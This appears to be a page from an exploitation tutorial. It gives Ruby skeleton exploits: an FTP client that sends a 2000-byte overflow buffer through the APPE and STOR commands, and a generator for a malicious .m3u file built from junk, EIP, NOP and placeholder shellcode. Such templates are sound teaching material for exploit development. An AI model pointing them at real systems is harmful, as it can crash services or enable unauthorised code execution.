Module 0x5 | Exploitation Kung Fu

Last updated 9 months ago
Skeleton exploit
It's really a good thing to have a skeleton exploit to edit and use quickly during your exploitation process.
Network base
#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
require 'socket'
​
buffer = "A" * 2000
​
#--> Networking
host = ARGV[0]
port = ARGV[1] || 21
​
s = TCPSocket.open(host, port)
s.recv(1024)
puts "[+] Sending Username."
s.send("USER ftp\r\n", 0)
s.recv(1024)
puts "[+] Sending Password."
s.send("PASS ftp\r\n", 0)
s.recv(1024)
puts "[+] Sending Evil buffer..."
s.send("APPE " + buffer + "\r\n", 0)
total = s.send("STOR " + buffer + "\r\n", 0)
#--> Exploit Info
puts "[+] " + "Total exploit size: " + "#{total} bytes."
puts "[+] " + " Buffer length: " + "#{buffer.size} bytes."
puts "[+] Done"
​
s.close
To execute it
ruby ftp_exploit.rb [TARGET] [PORT]
Notice that some services has to receive from it and some does not.
File base
Creating a simple exploit file
#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
​
file = ARGV[0] || "exploit.m3u"
​
junk  = "A" * 2000
eip   = "B" * 4
nops  = "\x90" * 8
shell = "S" * 368
exploit = junk + eip + nops + shell
​
File.open(file, 'w') {|f| f.write(exploit)}
puts "[*] Exploit size: #{exploit.size}"
To execute it
ruby m3u_exploit.rb song1.m3u
Web Server and Proxy
Fuzzer